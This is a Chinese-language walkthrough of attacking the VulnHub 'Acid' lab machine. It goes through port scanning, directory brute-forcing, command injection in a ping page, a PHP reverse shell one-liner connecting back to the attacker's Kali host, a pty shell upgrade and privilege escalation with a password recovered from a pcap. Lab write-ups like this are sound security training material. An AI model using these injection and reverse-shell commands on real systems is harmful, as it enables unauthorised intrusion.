一,前言
这几天又做了一套靶机,把其中的思路过程与大家一起分享交流一下。跟上次一样,还是找了一个安(bu)装(suan)包(tai)小(nan)的。其他的就不说了,下面开始紧张刺激的渗透测试实战吧。
二,安装、运行说明
* 靶机难度:初学者/中级
* 目 标:提权到root权限并查看flag
* 攻 击 机:运行在Vm Ware中的Kali Linux
靶 机:运行在Vm Ware中的Acid (下载地址:https://download.vulnhub.com/acid/Acid.rar)
* 网络设置:均为Nat连接模式
三,渗透过程
1,端口扫描和目录爆破
分别打开kali和Acid,这次的靶机并没有像上次一样在开机界面给出IP地址,看来我们要自己扫描一下。因为两机都为Nat连接模式,判断应在同一网段,在kali中打开命令终端,输入 Nmap -sP 192.168.50.0/24 ,找出靶机IP地址。
找到靶机地址为192.168.50.139。接下来在浏览器里打开看一下
连接失败,好吧,再用nmap扫描一下有没有开放的端口。kali命令行里输入Nmap -sV -p- 192.168.50.139
发现靶机开放了33447端口,在浏览器地址栏中输入此端口打开
欢迎来到酸的世界~~~(咋了,吃柠檬啦?)
这个页面没啥好看的,View source code看一下源代码。
好吧。。。。看来只能去kali中启动DirBuster,暴力破解web目录了。
注意到此事扫描出来的 /Challenge 目录与上面网页的标题相对应,不过先不管这些了,打开扫描结果的页面看一看。
Email Address 和 Password 本来想用burp爆破一下的,想了想浪费时间而且不一定有啥结果就先放到一边了。cake.php中点一下login就会跳转到index.php登录页面,include.php是一个文件包含漏洞页面,但是没有上传点也就无法通过上传文件拿shell。又分别查看了一下网页的源代码,都没发现什么东西,就不放上图片了。这时候发现cake.php的页面标题跟 /Challenge 页面的一样,果断在地址栏中输入打开看看。
根据报错提示说明还是存在这个页面的,继续爆破一下目录看看有没有别的可以访问的页面
看到有command.php了,先打开看看
这是个ping命令执行页面,输入127.0.0.1,开启burp抓包,在抓到的数据包中加上;ifconfig试试能不能执行
根据burp的响应包显示命令已经成功执行,那接下来就可以反弹shell了。
2,shell反弹
刷新一下command.php,同时在kali命令终端里输入 nc -lvnp 6666开始监听。(忽略我手指太粗把c敲成了v,毕竟这俩凑的太近了)
接下来尝试通过php反弹shell。回到浏览器页面,输入127.0.0.1,同时在burp里把抓到的数据包后面加上
{去掉;php -r '$sock=fsockopen("192.168.50.140",6666);exec("/bin/sh -i <&3 >&3 2>&3");'去掉}
注意为了避免被过滤,要将以上代码进行URL编码
nc成功拿到了一个shell,但是输入su命令无法执行,显示su: must be run from a terminal ,相同的问题上次已经遇到过一次,通过python调用本地shell即可,输入代码
python -c 'import pty;pty.spawn("/bin/bash")'
即可成功执行命令
3,提升权限
首先查看有哪些用户,输入命令 cat /etc/passwd,发现重点关注的用户acid,saman
接下来是查看用户文件,输入命令find / -user acid 2>/dev/null
看到了第一条/sbin/raw_vs_isi/hint.pcapng,但我不知道这是个什么文件类型,百度了一下是个能用Wireshark打开的流量抓包文件,把它传到本地打开看一下,执行命令
scp /sbin/raw_vs_isi/hint.pcapng root@192.168.50.140:/root/
不知道为啥,试了多次总是有如下报错
上网找了资料原来是ssh服务没有安装好,重新安装并开启即可,在这里就不详细介绍ssh的安装步骤了
重装后执行scp命令,成功保存文件
在Wireshark中打开,发现用户名saman及密码
接下来在命令窗口里su提权到saman、root就能获得flag。然后执行sudo -i 提权到root,密码同为1337hax0r,即可看到在root目录的flag.txt
三,总结
这套靶机的总体思路是扫描端口、爆破目录然后反弹shell即可进行root提权,虽然整体难度不高但是不少地方还是很考验我们的细心程度,比如在一开始的/chanllenge和/Magic_Box。而且在查看网络流量抓包文件的时候也考验人的耐心,整个流量抓包文件有6400行,说实话我看的时间不长就觉得没啥用不继续看,也是参考了其他的教程提示才找到的,以后要无论做什么事都更有耐心一些。
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或关注公众号